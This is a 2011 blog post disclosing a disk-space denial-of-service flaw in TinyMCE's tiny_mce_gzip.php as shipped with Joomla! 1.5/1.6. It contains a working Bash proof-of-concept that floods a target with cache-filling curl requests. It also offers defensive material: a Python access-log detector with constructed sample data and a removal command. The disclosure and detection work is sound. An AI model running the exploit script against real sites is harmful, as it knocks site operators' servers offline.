Tuesday, 05 April 2011 10:23

Back in February, I reported an issue with TinyMCE to the Joomla! Security Strike Team. Since then, they "fixed" it in 1.6.1, but failed to do so for 1.5.23. Joomla! 1.5.x ships with a script (tiny_mce_gzip.php) that is supposed to cache gzipped copies of TinyMCE, but not only is this script never used by Joomla! itself, it also never cleans up the cache files it writes, so every request with a new plugins value leaves another file on disk.

Without further ado, here is a POC Bash script that causes denial of service:

#!/bin/bash
# Exploit Title: Joomla! 1.5/1.6 TinyMCE Disk Space DOS
# Date: 25 February 2010
# Author: Jeff Channell
# Software Link: http://www.joomla.org
 
# header
clear
echo "###################################################"
echo "##  Joomla! 1.5.23/1.6.0 TinyMCE Disk Space DOS  ##"
echo "##       2011 jdc - for educational use only     ##"
echo "###################################################"
echo ""
echo -n "Host: http://"
read MCEDOS_JOOMLAHOST
echo ""
echo -n "1.5 Mode? y/n: "
read MCEDOS_OLDJOOMLA
 
MCEDOS_PART="media"
if [ "$MCEDOS_OLDJOOMLA" == "y" ]
then
  MCEDOS_PART="plugins"
fi
 
MCEDOS_USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
MCEDOS_ROOT_PATH="http://$MCEDOS_JOOMLAHOST/$MCEDOS_PART/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins="
 
echo ""
echo " * Filling up the drive of $MCEDOS_JOOMLAHOST ... Ctrl+C to quit"
echo ""
echo ""
 
while [ true ]; do
  MCEDOS_RANDOM=`date | md5sum | sed -e s/[^0-9a-f]//g`
  curl -H 'Accept-Encoding: gzip,deflate' -A "$MCEDOS_USERAGENT" "$MCEDOS_ROOT_PATH$MCEDOS_RANDOM" > /dev/null 2>&1 &
  echo -n "."
  sleep 1
done
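
For anyone running a 1.5.x site who cannot remove the file immediately, the request pattern above is easy to spot in access logs. The following is an added example (mine, not part of the original post or of Joomla!): it parses combined-format access log lines, picks out requests to tiny_mce_gzip.php with diskcache=true, and flags any client that sent many distinct plugins= values in a short window, since each distinct value forces a new cache file to be written. The log lines, IP addresses and thresholds are constructed for the example; the URL and user agent are the ones from the script above.

```python
"""Flag clients flooding the TinyMCE disk cache (added example, not from the post)."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_cache_request(path):
    """True when the request targets tiny_mce_gzip.php with disk caching switched on."""
    parts = urlsplit(path)
    if not parts.path.endswith("/tiny_mce_gzip.php"):
        return False
    return parse_qs(parts.query).get("diskcache", ["false"])[0].lower() == "true"


def plugins_value(path):
    """The plugins= query value; every distinct value yields a new cache file on disk."""
    return parse_qs(urlsplit(path).query).get("plugins", [""])[0]


def find_floods(lines, threshold=5, window_seconds=60):
    """Map client -> max number of distinct plugins= values seen in any window_seconds span,
    for clients that reached threshold. Normal editor use repeats the same plugin list."""
    by_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_cache_request(rec["path"]):
            continue
        by_host[rec["host"]].append((rec["time"], plugins_value(rec["path"])))

    flagged = {}
    for host, events in by_host.items():
        events.sort()
        best = 0
        for i, (start, _) in enumerate(events):
            seen = {p for t, p in events[i:] if (t - start).total_seconds() <= window_seconds}
            best = max(best, len(seen))
        if best >= threshold:
            flagged[host] = best
    return flagged


# --- constructed sample input (not real traffic) ---------------------------------
TINYMCE = ("/plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php"
           "?js=true&diskcache=true&compress=false&plugins=")
UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"


def _log(host, ts, path, agent):
    return f'{host} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "-" "{agent}"'


SAMPLE_LOG = [
    # one client, six requests in six seconds, each with a fresh 32-hex-digit plugins value
    _log("203.0.113.5", f"05/Apr/2011:10:23:0{i} +0000", TINYMCE + f"{i:032x}", UA)
    for i in range(6)
] + [
    # a normal editor user: same plugin list twice, plus an unrelated page view
    _log("198.51.100.7", "05/Apr/2011:10:24:00 +0000", TINYMCE + "table,paste", "Mozilla/5.0"),
    _log("198.51.100.7", "05/Apr/2011:10:24:30 +0000", TINYMCE + "table,paste", "Mozilla/5.0"),
    _log("198.51.100.7", "05/Apr/2011:10:25:00 +0000", "/index.php?option=com_content", "Mozilla/5.0"),
]


def demo():
    """Run the detector over the constructed sample; returns {'203.0.113.5': 6}."""
    return find_floods(SAMPLE_LOG)


if __name__ == "__main__":
    for host, count in demo().items():
        print(f"{host}: {count} distinct plugins= values within 60s - possible cache flood")
```

Pipe a real access log in with `find_floods(open("access.log"))`; the window and threshold are deliberately conservative, because a legitimate editor page loads the same plugin list every time and never produces dozens of distinct values.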
Joomla! 1.5.x users can protect themselves by deleting plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php (thanks to Amy Stephen for the suggestion).

UPDATE: Those with shell but no shell-fu might find this helpful as well: find . -type f -name tiny_mce_gzip.php -exec rm {} \;

Last Updated on Tuesday, 05 April 2011 11:15
 
Comments (2)
1 Thursday, 26 May 2011 16:05
towenware
Thanx !
Total novice here, but am sensitive regarding security. Setting up a Joomla! site soon.

BTW, where might I get a cool wavy captcha like you're using here in your comments section?
2 Saturday, 10 December 2011 13:19
PhilD
File still exists in 1.5.25, I assume issue still exists?



The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
